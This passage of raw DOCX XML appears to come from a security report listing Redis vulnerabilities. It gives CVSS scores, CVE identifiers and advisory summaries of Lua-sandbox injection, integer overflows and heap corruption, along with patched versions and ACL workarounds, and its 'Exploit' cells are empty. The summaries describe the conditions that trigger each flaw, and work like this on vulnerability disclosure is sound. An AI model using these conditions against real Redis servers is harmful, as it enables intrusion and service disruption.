          <w:p w14:paraId="0020171E"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6E6F8A84"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952324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821D420" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="54D3B84D"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3D171CE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1605CA9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28CF8B13" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>6.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="79388BF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ABCFBA6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F0EE372"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87">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2022-24735</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="12B178B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95D7C3D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6273E1F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in-memory database that persists on disk. By exploiting weaknesses in the Lua script execution environment, an attacker with access to Redis prior to version 7.0.0 or 6.2.7 can inject Lua code that will execute with the (potentially higher) privileges of another Redis user. The Lua script execution environment in Redis provides some measures that prevent a script from creating side effects that persist and can affect the execution of the same, or different script, at a later time. Several weaknesses of these measures have been publicly known for a long time, but they had no security impact as the Redis security model did not endorse the concept of users or privileges. With the introduction of ACLs in Redis 6.0, these weaknesses can be exploited by a less </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>privileged users to inject Lua code that will execute at a later time, when a privileged user executes a Lua script. The problem is fixed in Redis versions 7.0.0 and 6.2.7. An additional workaround to mitigate this problem without patching the redis-server executable, if Lua scripting is not being used, is to block access to `SCRIPT LOAD` and `EVAL` commands using ACL rules.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1D9539A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D718543" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47122153"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00D1A6F8"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69ADC1E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5FF2FC5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="29D84A79"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0E74ACF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9F3ECF4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DD639D0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="789E435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D1D4A3E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57B5E851"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88">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2021-32626</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="48AD90A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A8956BC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31D1621C"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In affected versions specially crafted Lua scripts executing in Redis can cause the heap-based Lua stack to be overflowed, due to incomplete checks for this condition. This can result with heap corruption and potentially remote code execution. This problem exists in all versions of Redis with Lua scripting support, starting from 2.6. The problem is fixed in versions 6.2.6, 6.0.16 and 5.0.14. For users unable to update an additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to restrict EVAL and EVALSHA commands.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="37C787D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593579F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40953964"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CB447FB"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279157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B3A5D73" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="791FC297"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19AFFBB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A3849D3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C74D8DA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1359912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F575646" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24956BE9"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89">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2023-25155</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="25D18B5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E215D67" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11091E06"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in-memory database that persists on disk. Authenticated users issuing specially crafted `SRANDMEMBER`, `ZRANDMEMBER`, and `HRANDFIELD` commands can trigger an integer overflow, resulting in a runtime assertion and termination of the Redis server process. This problem affects all Redis versions. Patches were released in Redis version(s) 6.0.18, 6.2.11 and 7.0.9.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="58F8D99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2DB8D87" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BD156B9"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5DC03C5D"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1DFF05C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2D892B4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="3980D1D7"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48EBC8C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B8CEFD1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48D906EF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="54F8DBE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8825ED9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C7D7B87"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0">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2023-28856</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0608301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A1A3D42" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BACFA3A"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Authenticated users can use the `HINCRBYFLOAT` command to create an invalid hash field that will crash Redis on access in affected versions. This issue has been addressed in in versions 7.0.11, 6.2.12, and 6.0.19. Users are advised to upgrade. There are no known workarounds for this issue.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="48B4BAE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32A35A8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05592A34"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5872E842"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3CFF8E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B4514F3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="34419A7A"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62469EA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C8BE9A3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E8F15DD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="129E683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A41E8BA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D8A02E8"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1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2021-21309</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="42C187C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2117320" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="527A8EB5"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open-source, in-memory database that persists on disk. In affected versions of Redis an integer overflow bug in 32-bit Redis version 4.0 or newer could be exploited to corrupt the heap and potentially result with remote code execution. Redis 4.0 or newer uses a configurable limit for the maximum supported bulk input size. By default, it is 512MB which is a safe value for all platforms. If the limit is significantly increased, receiving a large request from a client may trigger several integer overflow scenarios, which would result with buffer overflow and heap corruption. We believe this could in certain conditions be exploited for remote code execution. By default, authenticated Redis users have access to all configuration parameters and can therefore use the “CONFIG SET proto-max-bulk-len” to change the safe default, making the system vulnerable. **This problem only affects 32-bit Redis (on a 32-bit system, or as a 32-bit executable running on a 64-bit system).** The problem is fixed in version 6.2, and the fix is back ported to 6.0.11 and 5.0.11. Make sure you use one of these versions if you are running 32-bit Redis. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent clients from directly executing `CONFIG SET`: Using Redis 6.0 or newer, ACL configuration can be used to block the command. Using older versions, the `rename-command` configuration directive can be used to rename the command to a random string unknown to users, rendering it inaccessible. Please note that this workaround may have an additional impact on users or operational systems that expect `CONFIG SET` to behave in certain ways.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7F6B347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5839958" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="749E7E96"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4EC9336A"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30906C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C65688" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="2EF25DE6"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3F1E927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C554840" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EC177D2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="386503A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2E5137B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79291705"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2">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2021-32627</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="57A6555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64988EA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E1646C9"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In affected versions an integer overflow bug in Redis can be exploited to corrupt the heap and potentially result with remote code execution. The vulnerability involves changing the default proto-max-bulk-len and client-query-buffer-limit configuration parameters to very large values and constructing specially crafted very large stream elements. The problem is fixed in Redis 6.2.6, 6.0.16 and 5.0.14. For users unable to upgrade an additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from modifying the proto-max-bulk-len configuration parameter. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="205BCE7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32435DC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F32F132"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D0BEFF5"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7200717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E019692" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="2DFA2F97"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4539D38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60D0818" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CFC46EE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7B8D5BC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673DACC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="359DA345"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3">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2021-32628</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="270AC25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90655E7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="031A67BF"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open source, in-memory database that persists on disk. An integer overflow bug in the ziplist data structure used by all versions of Redis can be exploited to corrupt the heap and potentially result with remote code execution. The vulnerability involves </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>modifying the default ziplist configuration parameters (hash-max-ziplist-entries, hash-max-ziplist-value, zset-max-ziplist-entries or zset-max-ziplist-value) to a very large value, and then constructing specially crafted commands to create very large ziplists. The problem is fixed in Redis versions 6.2.6, 6.0.16, 5.0.14. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from modifying the above configuration parameters. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2033DD6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2CF1133" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CD3B0D6"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00C0B1B3"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1C37C2B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B6DE33C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="41B37261"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2BD4A10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2369BC9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="240340AB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="661AB9E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31AF1B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68176F6E"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4">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2021-32687</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="55811DD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A59F4A9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="580BBDE7"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An integer overflow bug affecting all versions of Redis can be exploited to corrupt the heap and potentially be used to leak arbitrary contents of the heap or trigger remote code execution. The vulnerability involves changing the default set-max-intset-entries configuration parameter to a very large value and constructing specially crafted commands to manipulate sets. The problem is fixed in Redis versions 6.2.6, 6.0.16 and 5.0.14. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from modifying the set-max-intset-entries configuration parameter. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7A90377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5626931" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B6A5D75"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09AD4BB2"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3A40635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83D8F41" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="4CAD952B"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290F512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32F0C51" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EF85CDC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6DA7ECE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BA9B204" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="481F23A9"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5">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2021-41099</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="10CBE84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E391477" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ED3074D"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open source, in-memory database that persists on disk. An integer overflow bug in the underlying string library can be used to corrupt the heap and potentially result with denial of service or remote code execution. The vulnerability involves changing the default proto-max-bulk-len configuration parameter to a very large value and constructing specially crafted network payloads or commands. The problem is fixed in Redis versions 6.2.6, 6.0.16 and 5.0.14. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from modifying the proto-max-bulk-len configuration parameter. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="733C240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99B5E7C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5884A1B3"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653EC568"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F09302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4280EB5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
